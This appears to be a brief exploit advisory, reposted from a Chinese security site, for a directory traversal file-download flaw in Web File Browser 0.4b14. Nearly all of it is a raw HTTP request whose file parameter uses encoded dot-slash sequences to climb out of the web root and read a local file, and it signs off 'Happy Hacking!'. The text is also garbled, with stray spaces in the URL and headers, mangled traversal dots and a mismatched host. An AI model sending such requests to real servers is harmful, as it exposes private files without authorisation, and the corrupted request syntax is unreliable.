Title: [Web File Browser 0.4b14 File Download Vulnerability]
Author: [Sangyun YOO] www.2cto.com yoosy0302 at naver dot com
: [Http://downloads.sourceforge.net/project/webfilebrowser/webfilebrowser/0.4b14/webfilebrowser-0.4b14.zip]
Affected Versions: [Web File Browser 0.4b14]
Test Platform: [Windows 7 Starter K]
---------------------------------------
Using Paros Tool Request Message to the modulation of the Request Line =>
GET http://www.bkjia.com/webFileBrowser. php? Act = download & subdir = & sortby = name & file =... % 2f... % 2f... % 2f... % 2f... % 2f... % 2f [localfile] HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd. ms-xpsdocument, application/xaml + xml, application/msword ,*/*
Accept-Language: ko
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;. net clr 1.1.4322;. net clr 2.0.50727;. net clr 3.0.20.6.2152;. net clr 3.5.30729)
Proxy-Connection: Keep-Alive
Host: 192.168.0.189
Cookie: user = admin; loginkey = login; AJXP_LAST_KNOWN_VERSION = 3.2.4; mx64B616EE8DEC99D3BFE053EAB04DC8 = login; login = login; tab_usersconfig = 0
===== Happy Hacking! =====